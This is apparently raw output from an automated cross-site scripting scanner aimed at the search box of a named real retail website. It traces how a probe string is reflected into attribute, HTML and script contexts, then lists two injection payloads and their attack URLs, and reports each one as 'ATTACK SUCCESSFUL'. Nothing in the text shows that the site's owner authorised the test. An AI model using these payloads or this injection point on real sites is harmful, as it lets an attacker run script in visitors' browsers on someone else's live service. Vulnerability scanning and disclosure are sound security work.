https://www.ruralking.com/all-departments/livestock-fencing/livestock-feed/sheep-goat-feed

GET Params:[1]
['q']
_______________________________________________________________________________________________________
https://www.ruralking.com/catalogsearch/result/?q=(uvw"xyz'yxz</zxy

----------------------------------------------------------------------------------
Attribute Context: [1]
<input id="search"
                           data-mage-init='{"quickSearch":{
                                "formSelector":"#search_mini_form",
                                "url":"https://www.ruralking.com/search/ajax/suggest/",
                                "destinationSelector":"#search_autocomplete"}
                           }'
                           type="text"
                           name="q"
                           value="(uvw&quot;xyz&#039;yxz&lt;/zxy"
                           placeholder="Search..."
                           class="input-text"
                           maxlength="128"
                           role="combobox"
                           aria-haspopup="false"
                           aria-autocomplete="both"
                           autocomplete="off"/>

----------------------------------------------------------------------------------
HTML Context: [2]
<title>Search results for: &#039;(uvw&quot;xyz&#039;yxz&lt;/zxy&#039;</title>
<strong>Search results for: &#039;(uvw&quot;xyz&#039;yxz&lt;/zxy&#039;</strong>

----------------------------------------------------------------------------------
Script Context: [2]
<script type="text/x-magento-init">
    {
        "body": {
            "pageCache": {"url":"https:\/\/www.ruralking.com\/page_cache\/block\/render\/?q=%28uvw%22xyz%27yxz%3C%2Fzxy","handles":["default","catalogsearch_result_index"],"originalRequest":{"route":"catalogsearch","controller":"result","action":"index","uri":"\/catalogsearch\/result\/?q=(uvw%22xyz'yxz%3C\/zxy"},"versionCookieName":"private_content_version"}        }
    }
</script>
<script type="text/javascript">
    UnbxdAnalyticsConf = window.UnbxdAnalyticsConf || {};
    UnbxdAnalyticsConf["query"] = "(uvw"xyz'yxz</zxy";
</script>

----------------------------------------------------------------------------------
URI Context: [0]

----------------------------------------------------------------------------------
Same Attr : [0]

----------------------------------------------------------------------------------
Same HTML : [0]

----------------------------------------------------------------------------------
Same Script : [0]

----------------------------------------------------------------------------------
Same URI : [0]


ENCODING     Presence	"	'	<	( 
ATTR:		True	True	True	True	False

Attack Payloads for ATTR
[]
ENCODING     Presence	"	'	<	( 
HTML:		True	True	True	True	False

Attack Payloads for HTML
[]
ENCODING     Presence	"	'	<	( 
HTML:		True	True	True	True	False

Attack Payloads for HTML
[]
ENCODING     Presence	"	'	<	( 
SCRIPT:		True	True	True	True	True

Attack Payloads for SCRIPT
[]
ENCODING     Presence	"	'	<	( 
SCRIPT:		True	False	True	False	False

Attack Payloads for SCRIPT
['"; confirm(1); "', '</script><script>alert(1)</script>']

SCRIPT Attack Url: https://www.ruralking.com/catalogsearch/result/?q="; confirm(1); "

=> ATTACK SUCCESSFUL with Payload: "; confirm(1); "
Detection of Payload: 

SCRIPT Attack Url: https://www.ruralking.com/catalogsearch/result/?q=</script><script>alert(1)</script>

=> ATTACK SUCCESSFUL with Payload: </script><script>alert(1)</script>
Detection of Payload: 
